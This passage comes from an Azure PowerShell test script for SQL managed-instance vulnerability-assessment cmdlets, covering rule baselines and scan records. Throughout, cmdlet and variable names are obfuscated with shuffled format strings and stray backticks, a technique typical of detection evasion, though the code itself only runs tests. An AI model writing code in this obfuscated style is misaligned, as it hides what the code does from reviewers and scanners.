		&("{2}{4}{1}{3}{0}"-f 'l','se','A','rt-AreEqua','s') ${P`AraMS}."Da`Ta`BA`SeNAME" ${b`ASELiNe}."daT`ABAs`ENAMe"
		&("{0}{1}{2}{3}"-f 'As','s','ert-AreE','qual') ${Rul`EID} ${B`AsEl`I`NE}."RU`LEId"
		&("{1}{2}{0}"-f 'al','Asser','t-AreEqu') ${F`Alse} ${B`AS`ElInE}."ruL`e`A`ppLIEST`OMAS`TEr"
		&("{4}{5}{3}{1}{2}{0}" -f'y','l','Arra','qua','Assert','-AreE') ${bA`se`lINETO`S`Et}[0] ${bA`sel`iNE}."Bas`el`INEReS`ULT"[0]."R`eSULT"
		&("{0}{3}{1}{5}{4}{2}"-f 'Asser','AreEq','y','t-','ra','ualAr') ${b`AsEL`InEtO`SeT}[1] ${ba`S`eline}."base`Lin`eR`E`sulT"[1]."REs`ULt"

		
		${B`A`sElI`N`eToSET} = @( ("{1}{2}{0}"-f'al3','Princi','p'), ("{3}{1}{0}{2}" -f'dmi','la','n','db_dd'), ("{2}{1}{0}" -f '_USER','QL','S'), ("{1}{0}"-f'ne','No')), @( ("{0}{2}{1}"-f 'P','cipal4','rin'), ("{2}{1}{3}{0}"-f 'admin','_dd','db','l'), ("{0}{1}"-f 'SQL_U','SER'), ("{0}{1}"-f 'Non','e'))
		&("{15}{0}{13}{1}{7}{14}{8}{12}{9}{3}{6}{5}{11}{10}{2}{4}" -f 'e','A','eBas','ne','eline','b','ra','zSqlIn','tanceDa','aseVul','l','ilityAssessmentRu','tab','t-','s','S') -ResourceGroupName ${p`Ar`AmS}."r`gna`mE" -InstanceName ${P`ArA`MS}."Ser`VERN`AMe" -DatabaseName ${paR`AmS}."d`A`Ta`BaseNAme" `
		-RuleId ${R`Uleid} -BaselineResult ${baseliNeT`o`seT}
		
		
		${BAs`El`ine} = &("{3}{11}{2}{7}{12}{4}{16}{15}{8}{6}{14}{5}{1}{17}{13}{10}{9}{0}" -f 'seline','it','-AzSq','Ge','tan','erabil','l','l','abaseVu','a','RuleB','t','Ins','ssessment','n','t','ceDa','yA') -ResourceGroupName ${p`ARAMs}."Rg`Na`mE" -InstanceName ${pa`RaMs}."SER`V`ERnAmE" -DatabaseName ${p`A`Rams}."d`ATAbaseNA`mE" `
		-RuleId ${RuLe`iD}

		&("{4}{3}{0}{1}{2}"-f'Eq','u','al','sert-Are','As') ${Para`ms}."r`GN`AME" ${b`A`SeLINE}."re`sO`Urc`Eg`ROUpNaMe"
		&("{2}{3}{1}{0}"-f 'qual','t-AreE','Asse','r') ${p`A`RaMs}."sE`RVE`RnAmE" ${B`AselINE}."i`NS`T`AncEnAmE"
		&("{3}{4}{0}{2}{1}"-f 't-Are','qual','E','Asse','r') ${P`ARA`Ms}."d`ATA`BAsENAmE" ${Ba`sElINE}."DaTA`B`A`SEnaMe"
		&("{1}{2}{3}{0}"-f 'Equal','Asse','rt-A','re') ${Ru`lE`ID} ${bas`E`liNE}."R`Ul`Eid"
		&("{4}{2}{0}{1}{3}" -f'e','Eq','sert-Ar','ual','As') ${f`ALsE} ${BA`sE`l`iNE}."RUl`EAp`pLi`eS`TOmaS`TeR"
		&("{3}{2}{1}{0}{4}{5}" -f 'rt-','se','s','A','Ar','eEqualArray') ${bA`s`ElInet`OsEt}[0] ${bA`se`lI`NE}."BasEl`iNeRES`Ult"[0]."rEs`Ult"
		&("{4}{1}{2}{0}{3}"-f'reEqua','ssert','-A','lArray','A') ${bas`e`l`In`EtOSEt}[1] ${B`A`SeLine}."BASELiN`ere`s`ULt"[1]."rEs`U`lt"

		
		&("{0}{5}{2}{11}{3}{12}{10}{1}{8}{6}{4}{7}{9}" -f'Cle','erabi','lI','a','se','ar-AzSq','yAssessmentRuleBa','l','lit','ine','ln','nst','nceDatabaseVu') -ResourceGroupName ${pa`RaMs}."Rgn`AmE" -InstanceName ${pa`RAmS}."se`R`VErnAME" `
		-DatabaseName ${PA`Ra`ms}."dAt`A`BaSen`Ame" -RuleId ${r`Ul`eid}

		
		&("{3}{4}{2}{6}{0}{5}{1}"-f 'ont','ns','-Throws','Asser','t','ai','C') -script { &("{10}{4}{15}{8}{5}{6}{7}{9}{0}{12}{1}{17}{11}{3}{13}{14}{2}{16}" -f 'Vu','r','Base','t','A','an','ce','Dat','lInst','abase','Get-','ili','lne','yAssessm','entRule','zSq','line','ab') -ResourceGroupName ${PaR`AmS}."r`Gname" -InstanceName ${pAR`A`Ms}."se`Rve`R`NaMe" `
		-DatabaseName ${P`Arams}."d`ATAbA`Sen`AMe" -RuleId ${R`Ul`EID} } -message ${basE`lINE`does`N`TexIs`TSER`ROrMe`S`sA`ge}

		&("{4}{3}{0}{2}{1}"-f'nta','s','in','wsCo','Assert-Thro') -script { &("{12}{3}{4}{6}{13}{11}{7}{1}{9}{8}{17}{18}{16}{0}{5}{14}{15}{2}{10}" -f 's','eVulne','eBa','ear-Az','Sq','ess','lI','anceDatabas','b','ra','seline','st','Cl','n','ment','Rul','As','ili','ty') -ResourceGroupName ${PA`RA`Ms}."R`g`NaME" -InstanceName ${Pa`RA`MS}."SerVE`Rn`AMe" `
		-DatabaseName ${p`ARa`MS}."dAt`AbAS`ENAmE" -RuleId ${ru`lE`ID} } -message ${B`A`s`elinedoesnTe`X`iSt`SeRroRmEsSage}

		
		&("{16}{2}{8}{5}{0}{6}{10}{11}{17}{7}{3}{15}{1}{13}{9}{14}{4}{12}"-f'q','y','-A','Vulnerabil','leB','S','lIns','e','z','sessmen','tanceD','ata','aseline','As','tRu','it','Set','bas') -ResourceGroupName ${p`A`RaMS}."rGnA`Me" -InstanceName ${P`ARaMS}."sE`R`VE`RNAMe" -DatabaseName ${pAr`AmS}."dA`TAbAS`ENA`ME" `
		-RuleId ${r`U`LeID} -BaselineResult ${B`AsEL`inE`TOSeT}

		
		&("{4}{2}{0}{3}{1}"-f't-Thro','s','sser','wsContain','A') -script { &("{8}{5}{1}{0}{7}{3}{11}{4}{2}{9}{10}{12}{6}{13}{14}"-f'zSqlIns','t-A','seVu','n','ba','e','u','ta','G','lnerabilityAss','essm','ceData','entR','leBas','eline') -ResourceGroupName ${Para`MS}."r`gnA`Me" -InstanceName ${p`ARAmS}."s`Er`VerNA`me" `
		-DatabaseName ${p`ArA`ms}."dAT`AbaSEn`AmE" -RuleId ${RUle`iD} -RuleAppliesToMaster } -message ${Bas`eLinEDoEsN`T`EX`is`TsErrORM`EssAGE}

		&("{0}{1}{2}{3}{4}" -f'Assert-Thr','o','ws','Cont','ains') -script { &("{8}{2}{6}{12}{14}{9}{0}{5}{15}{13}{1}{11}{4}{7}{16}{3}{10}" -f'nceD','Assess','r-Az','as','entRu','atabaseVulne','S','l','Clea','a','eline','m','q','ity','lInst','rabil','eB') -ResourceGroupName ${PAR`AMs}."Rg`N`AmE" -InstanceName ${p`ARamS}."SE`RVE`RNAmE" `
		-DatabaseName ${Pa`RaMS}."d`Ata`BASENamE" -RuleId ${rul`eId} -RuleAppliesToMaster} -message ${bAselI`Ne`DO`Es`N`T`exIStsERRO`RMESsage}

		&("{10}{7}{2}{1}{3}{0}{9}{6}{4}{8}{5}"-f'e','tanceDat','Ins','abaseVuln','ssessmen','eline','abilityA','zSql','tRuleBas','r','Set-A') -ResourceGroupName ${pA`R`AmS}."rgN`AmE" -InstanceName ${pA`R`AMs}."serV`E`RNa`ME" -DatabaseName ${p`A`RAMS}."DatABas`e`Na`me" `
		-RuleId ${ru`leId} -RuleAppliesToMaster -BaselineResult ${BaS`E`L`iNe`TOseT}

		${Bas`E`L`iNE} = &("{4}{2}{0}{1}{3}" -f'lInst','anceDataba','-AzSq','se','Get') -ResourceGroupName ${p`ARAmS}."RG`Na`me" -InstanceName ${PAR`AmS}."se`RVern`A`ME" -Name ${PAR`AMS}."DAtAba`sEna`me"`
		| &("{0}{1}{7}{8}{6}{3}{2}{9}{4}{5}{10}"-f 'Get','-AzSql','yAs','seVulnerabilit','m','entRuleBasel','taba','In','stanceDa','sess','ine') -RuleId ${RU`lEiD} -RuleAppliesToMaster
		&("{1}{2}{3}{0}"-f'qual','A','ssert-','AreE') ${P`ARAMS}."rgN`AMe" ${b`AsE`lInE}."r`es`ouRcEGroUPnA`me"
		&("{1}{0}{3}{2}" -f 'eEqu','Assert-Ar','l','a') ${p`ARa`MS}."Se`RV`ER`NaMe" ${Ba`Seli`Ne}."I`NsTa`NC`ENAME"
		&("{2}{3}{0}{1}" -f'eEqu','al','Asser','t-Ar') ${p`AraMs}."dA`T`AbasENaME" ${BaSeL`i`NE}."dA`TaBAse`N`AMe"
		&("{1}{0}{3}{2}{4}" -f'Ar','Assert-','Equa','e','l') ${R`UlE`id} ${BA`se`LiNe}."r`U`LEId"
		&("{3}{1}{0}{2}"-f 'ua','reEq','l','Assert-A') ${t`RuE} ${base`LiNE}."R`UlEaP`PlIE`STo`masTeR"
		&("{0}{1}{3}{4}{2}"-f'Ass','ert-AreE','y','qualArr','a') ${b`A`selI`NEtOSEt}[0] ${b`AsE`L`InE}."BA`Se`LIN`eR`eSUlt"[0]."RE`Sult"
		&("{2}{0}{4}{3}{1}{5}"-f'rt-','al','Asse','reEqu','A','Array') ${BAsELINe`To`s`et}[1] ${bAs`eLi`Ne}."b`A`SE`LiNe`RESUlT"[1]."REsU`Lt"

		&("{6}{8}{10}{2}{3}{1}{12}{0}{11}{9}{7}{4}{5}" -f 'ln','nc','Sql','Insta','eBas','eline','Cl','AssessmentRul','e','lity','ar-Az','erabi','eDatabaseVu') -ResourceGroupName ${P`A`RAMs}."R`GN`AMe" -InstanceName ${P`AR`AMS}."s`ERVe`R`NAME" -DatabaseName ${Pa`RaMS}."dATa`B`ASen`Ame" `
		-RuleId ${r`UleID} -RuleAppliesToMaster

		
		&("{5}{8}{1}{3}{6}{9}{0}{10}{4}{2}{7}{11}" -f 'Databa','zSql','sessmen','Ins','eVulnerabilityAs','S','tan','tRuleBaseli','et-A','ce','s','ne') -ResourceGroupName ${PaR`AMS}."RGn`AMe" -InstanceName ${pa`R`AMs}."SEr`V`eRnaME" -DatabaseName ${PA`RamS}."DA`TA`BASeNaME" `
		-RuleId ${RUl`E`ID} -BaselineResult ${b`A`SE`lINEToset}
		
		&("{6}{9}{8}{1}{3}{7}{0}{5}{4}{2}"-f 'ul','t','line','yAs','e','eBas','Get-','sessmentR','i','AzSqlInstanceDatabaseVulnerabil') -ResourceGroupName ${PA`RAMS}."rGn`AME" -InstanceName ${P`Ar`AmS}."Se`R`V`erNAMe" -DatabaseName ${Par`A`Ms}."dAtabA`s`ena`mE" `
		-RuleId ${RU`LeiD} | &("{16}{2}{1}{15}{9}{13}{12}{3}{14}{0}{8}{17}{4}{10}{11}{5}{6}{7}"-f'l','-','et','seVul','ss','ntRu','leBaselin','e','i','lInst','essm','e','ba','anceData','nerabi','AzSq','S','tyA')

		${bas`e`LIne} = &("{5}{6}{4}{3}{0}{2}{1}"-f 'anceD','abase','at','t','zSqlIns','G','et-A') -ResourceGroupName ${Pa`R`AMS}."RgN`AmE" -InstanceName ${P`AR`AMs}."s`E`RVeRna`ME" -Name ${PAr`AMs}."daTaba`SE`NAmE" | &("{9}{11}{8}{0}{2}{5}{4}{1}{6}{7}{10}{3}" -f 'tabaseVu','ssmentRule','lne','line','bilityAsse','ra','B','as','anceDa','Get-AzSql','e','Inst') `
		-RuleId ${RU`LEid}
		&("{3}{4}{1}{2}{0}"-f'l','E','qua','Asser','t-Are') ${P`ARA`ms}."Rg`Name" ${b`As`eliNe}."REs`OUR`CEG`R`ouPNAmE"
		&("{4}{3}{2}{1}{0}"-f 'al','u','eEq','-Ar','Assert') ${paR`AmS}."servERn`A`Me" ${bas`e`LINe}."Ins`TanceN`Ame"
		&("{2}{4}{3}{0}{1}"-f'qua','l','Ass','AreE','ert-') ${PA`Ra`Ms}."dAT`A`Bas`ENAme" ${B`A`SELIne}."Da`Taba`sEn`AMe"
		&("{1}{3}{2}{4}{0}" -f'al','Assert-','e','Ar','Equ') ${r`U`leID} ${BA`sel`Ine}."R`ULeID"
		&("{0}{4}{3}{1}{2}" -f 'A','-AreEqu','al','t','sser') ${F`ALSe} ${Ba`sEline}."r`UL`Eap`pLIEs`TomA`STer"
		&("{1}{3}{2}{6}{5}{0}{4}" -f'alArr','Ass','t-','er','ay','Equ','Are') ${BASElINEt`oS`ET}[0] ${baSe`LI`Ne}."bASEL`iNeR`e`SU`LT"[0]."Res`ULt"
		&("{0}{4}{3}{2}{1}" -f'Asse','alArray','Equ','re','rt-A') ${B`AsE`LIN`etoSEt}[1] ${B`AsELINE}."BAsElInER`esU`LT"[1]."R`EsULT"

		&("{4}{3}{0}{1}{5}{2}" -f'ta','nce','abase','t-AzSqlIns','Ge','Dat') -ResourceGroupName ${PAR`A`mS}."rG`N`AME" -InstanceName ${Pa`R`AMs}."s`eRV`erNAMe" -Name ${pA`RAms}."daTAb`A`SeN`AmE" | &("{13}{0}{4}{2}{3}{10}{7}{1}{15}{5}{9}{6}{14}{8}{11}{12}"-f'zSql','aseVulner','ta','nceDa','Ins','ity','ses','ab','tRuleBa','As','t','se','line','Clear-A','smen','abil') `
		-RuleId ${Ru`lE`id}
		&("{2}{5}{0}{4}{3}{1}"-f 'sert-','ins','A','hrowsConta','T','s') -script { &("{14}{12}{0}{1}{9}{13}{8}{5}{6}{2}{7}{4}{11}{3}{10}" -f'nst','anceDat','sment','l','uleB','ilityAss','es','R','nerab','abas','ine','ase','lI','eVul','Get-AzSq') -ResourceGroupName ${P`ArA`MS}."r`gn`AMe" -InstanceName ${PaRa`MS}."S`eRVE`RNaMe" `
		-DatabaseName ${pAR`AmS}."dat`AbaSe`NA`ME" -RuleId ${R`Ul`eid} } -message ${BaSELin`E`dOe`s`NtExistSErR`OrM`EssaGe}

		
		&("{12}{1}{0}{10}{11}{7}{8}{5}{9}{4}{3}{6}{2}"-f '-A','t','RuleBaseline','li','rabi','a','tyAssessment','n','stanceDatab','seVulne','zSq','lI','Se') -ResourceGroupName ${P`ArA`Ms}."RG`NAMe" -InstanceName ${PaR`AMS}."S`eRVE`RName" -DatabaseName ${PA`R`AmS}."Dat`ABAS`eN`Ame" `
		-RuleId ${r`ULE`id} -BaselineResult ${BasEl`ineto`S`ET} -WhatIf
		
		
		&("{5}{3}{0}{1}{4}{2}"-f't','-Thr','ins','sser','owsConta','A') -script { &("{8}{12}{9}{3}{5}{6}{4}{10}{7}{2}{1}{0}{11}" -f 'mentRuleBaseli','lityAssess','erabi','zSqlInstan','ab','c','eDat','uln','C','r-A','aseV','ne','lea') -ResourceGroupName ${P`ArAMs}."rgNA`me" -InstanceName ${pAR`A`mS}."s`E`RvErnamE" -DatabaseName ${Pa`RamS}."Da`Tab`AsenaMe" `
		-RuleId ${R`ULe`Id} } -message ${BASElIN`e`DOE`S`NtexIs`TsErRo`R`m`eSs`AGE}

		
		&("{10}{1}{3}{4}{0}{8}{5}{9}{11}{13}{12}{7}{2}{6}"-f 'e','q','RuleBa','lInstanceD','atabas','lity','seline','nt','Vulnerabi','As','Set-AzS','se','me','ss') -ResourceGroupName ${pa`RAMS}."R`gNAmE" -InstanceName ${PA`Ra`MS}."sErVe`R`NamE" -DatabaseName ${ParA`ms}."d`At`AbaseNaMe" `
		-RuleId ${r`U`lEID} -BaselineResult ${baSELI`NE`TOS`eT}

		&("{5}{0}{1}{8}{4}{2}{3}{6}{7}{9}" -f 'ear-A','zSqlIns','ta','baseVulnerab','anceDa','Cl','ilityAssessmentR','uleBa','t','seline') -ResourceGroupName ${PA`Ra`ms}."RgNa`ME" -InstanceName ${PAR`AmS}."SER`VErnA`ME" `
		-DatabaseName ${pArA`MS}."DAtAB`AsENA`me" -RuleId ${RUl`eiD} -WhatIf
		
		
		&("{8}{10}{5}{9}{3}{12}{1}{0}{11}{13}{7}{4}{2}{6}{14}"-f'Vulner','ase','uleBase','ce','entR','-A','li','ssm','Cle','zSqlInstan','ar','ability','Datab','Asse','ne') -ResourceGroupName ${par`Ams}."RG`NAme" -InstanceName ${PAr`AmS}."SERvE`Rna`ME" -DatabaseName ${p`AraMS}."DaT`AB`A`sEnAME" `
		-RuleId ${R`UL`eid}
	}
	finally
	{
		
		&("{10}{13}{3}{2}{7}{9}{1}{4}{8}{0}{12}{5}{11}{6}" -f'tanc','en','ilit','rab','tMana','est','ment','yAs','gedIns','sessm','R','Environ','eT','emove-Vulne') ${t`estsUf`Fix}
	}
}


function TEs`T-vu`lnera`B`I`lItYAs`sEsS`M`enTM`Ana`gED`DATabASE`s`CANR`eCoRDG`etLi`st`TEst
{
	
	${TeSTS`UF`FIx} = &("{1}{2}{0}" -f 'ame','get','AssetN')
	&("{7}{8}{1}{4}{6}{9}{5}{3}{10}{0}{2}" -f 'nvironme','s','nt','ce','sme','stan','nt','Create-VulnerabilityA','sse','ManagedIn','TestE') ${TeS`TsufF`IX}
	${PA`RA`ms} = &("{12}{17}{18}{8}{15}{13}{6}{14}{9}{16}{7}{11}{2}{0}{5}{1}{3}{4}{10}" -f'ron','ara','nvi','m','eter','mentP','mentMa','t','Vulne','d','s','E','Ge','ss','nage','rabilityAsse','InstanceTes','t-S','ql') ${TEsts`U`FFIX}

	try
	{
		
		&("{1}{5}{3}{11}{4}{6}{9}{10}{0}{2}{8}{7}"-f 'Se','Enabl','cu','Az','I','e-','nstance','y','rit','Advanced','Data','Sql') -ResourceGroupName ${par`AMs}."rGNA`Me" -InstanceName ${pa`RA`Ms}."Serv`eRN`AME" -DoNotConfigureVulnerabilityAssessment

		&("{1}{4}{3}{9}{11}{7}{10}{2}{8}{6}{5}{0}"-f'g','Update-AzSqlIn','mentS','ceDa','stan','in','t','erabil','et','ta','ityAssess','baseVuln') -ResourceGroupName ${P`ARAmS}."RgN`AmE" -InstanceName ${Pa`RA`Ms}."sER`VeR`NAmE" -DatabaseName ${pAR`Ams}."dATA`B`ASeNAME" `
			 -StorageAccountName ${p`AR`AmS}."s`TOr`AGe`Acc`ouNt"
	
		
		try
		{
			&("{14}{0}{10}{11}{12}{15}{2}{6}{5}{13}{9}{4}{8}{3}{7}{1}" -f'AzS','tScan','atab','yAs','ra','Vu','ase','sessmen','bilit','e','qlI','ns','tan','ln','Start-','ceD') -ResourceGroupName ${PAR`AMS}."r`GN`AME" -InstanceName ${PA`Ra`ms}."Ser`Ve`RN`AmE" -DatabaseName ${pAr`Ams}."DATAB`As`EnA`Me" 
		}
		catch
		{
			if ((&("{1}{4}{0}{2}{3}"-f'qlTe','Get-','stM','ode','S')) -eq ("{1}{0}" -f'ayback','Pl'))
			{
				
				
			}
			else
			{
				throw;
			}
		}

		
		${sC`A`NId1} = ("{2}{4}{1}{0}{3}{5}" -f 'L','t','cmd','ist','letGe','Scan')
		${sCa`NjoB} = &("{3}{2}{0}{6}{5}{8}{9}{1}{4}{7}" -f'eDatabaseV','e','nstanc','Start-AzSqlI','s','lne','u','smentScan','ra','bilityAss') -ResourceGroupName ${PA`RaMS}."rGnA`mE" -InstanceName ${P`ARAMs}."SERV`ern`AME" -DatabaseName ${pAr`A`MS}."d`AtAbAse`N`AmE" -ScanId ${s`CAN`id1} -AsJob
		${s`CAN`Job} | &("{0}{2}{1}" -f'W','ob','ait-J')
		${S`C`AN`RecOrd1} = ${S`C`ANjob} | &("{1}{0}{2}"-f 'i','Rece','ve-Job')

		
		&("{3}{2}{1}{0}" -f 'l','ua','ssert-AreEq','A') ${PAra`MS}."r`GNa`mE" ${S`cA`NRecOrd1}."ReSO`UrC`eGrou`P`N`AME"
		&("{2}{0}{1}{3}"-f 't-A','r','Asser','eEqual') ${Pa`RA`ms}."sErv`eR`NAmE" ${ScaN`RE`cO`RD1}."i`NSt`Ancen`Ame" 
		&("{2}{1}{0}" -f 'qual','ssert-AreE','A') ${P`A`RAMs}."DAtaBaSe`Na`ME" ${ScAnRe`C`orD1}."da`T`AB`AseName" 
		&("{2}{0}{1}{3}"-f 'ser','t-','As','AreEqual') ${sc`AN`Id1} ${s`cAnrECo`RD1}."S`CAn`id"
		&("{2}{1}{0}{3}" -f 't-AreEqu','ser','As','al') ("{1}{0}"-f'd','OnDeman') ${ScANrEcO`R`D1}."TrigGE`RtY`pE"

		
		${SCA`N`R`ECOrD1fr`OM`GEt} = &("{8}{5}{6}{0}{7}{1}{4}{9}{3}{2}" -f 'li','men','Record','an','tS','stanceDatabaseVulne','rabi','tyAssess','Get-AzSqlIn','c') -ResourceGroupName ${P`ARA`Ms}."R`GnamE" -InstanceName ${P`Ar`AMs}."se`RvEr`N`Ame" `
		-DatabaseName ${pa`RAms}."datABase`Na`me" -ScanId ${S`cAn`Id1}

		&("{1}{2}{0}"-f'AreEqual','Asser','t-') ${sC`Anr`E`COrD1FRoMg`ET}."ReSO`URC`egr`OU`P`NAmE" ${scAn`RE`CorD1}."rESO`UrceGROuP`N`AME"
		&("{0}{2}{3}{1}"-f'Ass','al','ert-A','reEqu') ${S`CanreCo`Rd`1`Fr`omget}."Insta`NCEnA`me" ${sCaN`Re`cO`Rd1}."INSta`N`cenamE"
		&("{2}{0}{1}"-f 'sert-','AreEqual','As') ${s`CANReCOrd1`Fr`OMG`ET}."DATaBaS`e`NaME" ${SCa`NrE`cOrd1}."DATABAs`EN`Ame"
		&("{2}{0}{3}{1}"-f'sse','qual','A','rt-AreE') ${SCANRe`cOrD`1f`ROM`g`et}."S`CaN`ID" ${SCAN`ReCO`R`D1}."s`Can`Id"
		&("{2}{0}{1}"-f 'e','Equal','Assert-Ar') ${sCANr`ECord`1frOmg`Et}."tR`IGgEr`TY`pe" ${SCaNReC`O`RD1}."TRIGGe`R`TYpE"
		&("{3}{1}{2}{0}"-f'Equal','sser','t-Are','A') ${sC`An`Re`Co`RD`1fROmGeT}."sT`AtE" ${ScA`Nre`CoRd1}."s`TaTE"
		&("{0}{2}{3}{1}{4}"-f'As','e','sert','-Ar','Equal') ${sc`Anre`c`Or`d1F`ROMget}."sTA`Rt`TimE" ${SCa`NrE`CO`RD1}."stA`RTti`ME"
		&("{1}{2}{0}{3}" -f 'Equ','A','ssert-Are','al') ${S`C`AN`RECORd`1F`ROMGEt}."E`NdtImE" ${S`CAnRec`ORD1}."En`DT`iMe"
		&("{0}{1}{3}{2}"-f 'Asse','rt-AreE','al','qu') ${Sc`ANrec`orD1`F`ROM`get}."E`RRO`Rs" ${sCa`Nr`eCoR`D1}."E`RRoRS"
		&("{0}{2}{1}"-f'Ass','al','ert-AreEqu') ${SCa`N`ReCORD1frO`m`GEt}."SCA`N`Re`SUltSl`OCA`TionpaTh" ${sca`Nr`EC`orD1}."SC`A`Nr`E`su`L`TSlOcAtIONP`AtH"
		&("{2}{3}{0}{4}{1}"-f'rt','al','Ass','e','-AreEqu') ${scAN`RECo`RD`1`FRoMGEt}."NUm`BeRO`F`FAil`e`DS`ECuri`TyC`HeckS" ${sCaNR`E`co`RD1}."NU`MBerOFfai`Led`seCu`Ri`TYChe`C`kS"

		
		${sc`AnreC`o`Rd1f`R`omgeT} = &("{3}{6}{2}{4}{5}{1}{0}" -f 'atabase','anceD','Sq','Get','l','Inst','-Az') -ResourceGroupName ${pa`R`AMS}."rGn`AmE" -InstanceName ${PAra`MS}."sEr`VeRN`Ame" -Name ${pAr`AMs}."datA`B`A`SeNaME" | &("{12}{8}{1}{7}{5}{3}{13}{6}{11}{10}{9}{2}{4}{0}" -f 'canRecord','nc','es','a','smentS','D','s','e','-AzSqlInsta','tyAss','li','eVulnerabi','Get','taba') `
		-ScanId ${S`caNID1}

		&("{0}{2}{1}{3}"-f'Assert-','qu','AreE','al') ${Scanr`eCoR`D`1fRoMgEt}."rE`sOUrCE`gr`oupnAme" ${Scanre`C`ORD1}."RE`S`Ou`R`CEGROUpNaMe"
		&("{4}{1}{3}{0}{2}" -f 'Equ','sert-','al','Are','As') ${sca`NRE`cORd1`FROM`gEt}."InS`TA`NcEn`Ame" ${Sc`ANREc`ord1}."iNSTAnc`Ena`Me"
		&("{1}{3}{2}{0}{4}"-f 'q','A','E','ssert-Are','ual') ${s`cANRecOrd1`Fr`omGeT}."Dat`A`BAs`EnAmE" ${ScaN`R`eco`Rd1}."da`TaBASen`AmE"
		&("{2}{1}{3}{0}"-f 'l','rt-Are','Asse','Equa') ${sCAN`RE`cORd1`FrOmG`eT}."SCA`N`ID" ${sc`ANre`CO`Rd1}."sc`A`NiD"
		&("{4}{1}{2}{0}{3}" -f'E','A','re','qual','Assert-') ${Sc`A`NRe`CO`RD1FRoMG`eT}."TRiGGe`R`Ty`PE" ${s`CAnREcOr`d1}."tr`IGgErt`ype"
		&("{1}{0}{3}{2}"-f's','As','l','ert-AreEqua') ${scANr`e`C`O`RD1frO`Mget}."stA`Te" ${ScA`NreC`OrD1}."s`TATE"
		&("{3}{2}{0}{1}"-f'qu','al','t-AreE','Asser') ${SCanREc`ORd1f`R`om`GeT}."sTAr`T`TiME" ${s`C`A`NREcoRd1}."sTaRT`TimE"
		&("{0}{1}{2}{3}"-f 'Asser','t-AreE','qu','al') ${SCAnr`ECORd1`FRom`GET}."eN`d`TIme" ${sc`ANr`Eco`RD1}."e`N`DTiME"
		&("{3}{1}{2}{0}{4}" -f'qua','ser','t-AreE','As','l') ${sCa`N`RecORD1`F`RomGET}."er`R`ors" ${scAn`ReC`oRD1}."Err`O`Rs"
		&("{1}{3}{2}{0}"-f'al','A','qu','ssert-AreE') ${sCanre`C`Ord1`F`RomgeT}."sCa`NReS`UL`Tslo`CaTI`ONPATh" ${scAn`ReC`Or`d1}."Sc`AnResu`LTsLO`cA`TiONpa`Th"
		&("{2}{1}{3}{0}{4}"-f'ua','ssert-Ar','A','eEq','l') ${SCaN`R`Ecord1`FrOMGEt}."nUM`BerO`FfaiLed`SEC`URI`Ty`c`HEc`ks" ${s`c`AnrecOrd1}."NumB`EroffA`ILeDs`EcuR`It`y`CHECks"

		
		${exCpECtedSc`A`NCO`UNt} = 2
		${SC`AnreCO`Rdlist} = &("{0}{3}{4}{16}{6}{10}{5}{13}{9}{7}{11}{12}{8}{2}{17}{1}{14}{15}" -f 'Get','tSca','yA','-A','z','Databa','qlInst','e','it','uln','ance','r','abil','seV','nRecor','d','S','ssessmen') -ResourceGroupName ${pA`RA`MS}."rg`NAme" -InstanceName ${pAR`A`Ms}."S`E`RverNamE" -DatabaseName ${PA`RaMS}."daTA`Bas`EnaMe" 
		&("{0}{3}{2}{1}{4}" -f'Asse','reEqua','A','rt-','l') ${ExC`PE`C`TE`D`scaNcount} ${scaNReCORDl`i`St}."COU`NT"

		${sCa`NR`EC`O`Rd1Fr`OMlISTc`mDlET} = ${Sc`ANRe`cordl`IsT}[${excp`E`cTEdscaN`cOuNt}-1]
		&("{0}{3}{1}{4}{2}" -f'Asse','AreE','al','rt-','qu') ${sCANrecord1`Fr`oM`lI`St`C`mDLET}."REsoUR`CE`grou`pnamE" ${scAn`REC`or`d1}."R`E`sOuRCE`grouPnAmE"
		&("{1}{2}{3}{0}" -f 'l','Asse','rt-Are','Equa') ${sCa`NRE`Cord1fROMLISTC`mDl`ET}."Instan`Ce`NaME" ${S`c`A`NREcOrd1}."In`STa`NCeN`Ame"
		&("{0}{3}{2}{1}" -f 'Assert','eEqual','r','-A') ${sca`NRe`COR`D1f`ROmlI`STCmd`L`Et}."d`AtabA`SeNA`me" ${sC`An`R`eCOrD1}."D`Ata`BASeNamE"
		&("{1}{2}{0}" -f 'l','Assert-Ar','eEqua') ${S`canR`Ecor`d1F`R`oMLIs`T`cMdLeT}."ScaN`id" ${SC`AN`Re`CoRD1}."s`cA`NID"
		&("{0}{3}{4}{2}{1}"-f'A','eEqual','r','sser','t-A') ${sCA`NReC`orD`1`Fro`m`LiStCmdLet}."trIGgErT`Y`pe" ${s`c`Anrec`orD1}."tRi`g`Ge`RTYPE"
		&("{2}{1}{4}{3}{0}"-f 'l','ert-Are','Ass','ua','Eq') ${S`ca`NRecOrD`1f`R`oMl`IsTcMdLeT}."S`TatE" ${sca`NrEc`Or`d1}."sTA`Te"
		&("{2}{3}{0}{1}"-f'eEqu','al','Asser','t-Ar') ${ScanrEC`o`R`d1fRO`mL`istCmdL`ET}."S`Tar`TTIMe" ${SCa`N`RE`CorD1}."st`ART`TImE"
		&("{3}{2}{1}{0}"-f 'l','qua','sert-AreE','As') ${SCANREcOR`d1f`R`OMl`i`stcMDl`ET}."e`ND`TImE" ${sCa`NREC`Or`D1}."eNd`T`ime"
		&("{0}{3}{2}{1}" -f 'A','eEqual','t-Ar','sser') ${sCA`Nr`EcO`R`d1FRom`liST`cmDLET}."e`RRo`RS" ${S`ca`N`RECoRD1}."e`RR`OrS"
		&("{0}{4}{1}{2}{3}"-f'Assert-','E','qu','al','Are') ${s`C`ANrEC`or`D`1fromLIS`TCMdL`eT}."scAnR`E`SuL`TS`LOCatiOnP`ATH" ${Sc`An`ReCO`RD1}."scANr`EsUL`T`sLOc`AT`iO`NpaTh"
		&("{1}{3}{2}{0}"-f'ual','As','-AreEq','sert') ${SCaN`RecO`Rd1F`Ro`ml`IsTcMDLet}."Nu`MBERO`FFA`iLEd`SecuriTYC`heCKS" ${scAn`RE`coRd1}."nU`mberOFf`AIleDsE`CURITy`c`hec`kS"

		
		${eXCPec`T`edscAN`COuNt} = ${eXC`pE`CT`eDscANcOunt} + 1
		&("{3}{2}{4}{0}{5}{1}" -f'ceDat','se','zS','Get-A','qlInstan','aba') -ResourceGroupName ${PA`RA`ms}."rg`NAMe" -InstanceName ${P`AR`Ams}."s`eRveR`NAme" -Name ${PaRa`ms}."DaT`AbA`S`eName" `
